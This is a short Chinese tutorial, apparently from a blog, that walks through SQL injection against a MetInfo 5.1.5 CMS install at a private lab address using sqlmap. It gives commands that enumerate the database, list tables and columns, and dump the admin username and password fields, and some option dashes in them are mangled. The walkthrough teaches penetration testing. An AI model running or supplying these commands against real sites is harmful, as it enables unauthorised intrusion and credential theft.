上次叉叉讲了Sqlmap简单注入(access数据库)教程,这次咱说说MySql数据库
MetInfo,是一款强大的企业网站管理系统,采用PHP+Mysql架构。
叉叉下载的是MetInfo 5.1.5的免费版本,咱不是大拿,不会分析源码,直接丢到WVS里面扫
发现注入点,打开我们的backtrack5,运行Sqlmap神器
获取当前用户名称,输入命令:python sqlmap.py -uhttp://192.168.121.1/MetInfo/about/show.php?id=22–current-user
获取当前数据库名称,输入命令:python sqlmap.py -uhttp://192.168.121.1/MetInfo/about/show.php?id=22–current-db
得到数据库名为:met
列数据库表名,输入命令:python sqlmap.py -uhttp://192.168.121.1/MetInfo/about/show.php?id=22–tables -D “met“成功得到”met”数据库的表名如下图:
列admin表的字段,输入命令:python sqlmap.py -uhttp://192.168.121.1/MetInfo/about/show.php?id=22–columns -T “met_admin_table“ -D “met”
上图显示成功获取met_admin_table表的字段,下面dump出admin_name和admin_pass内容,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
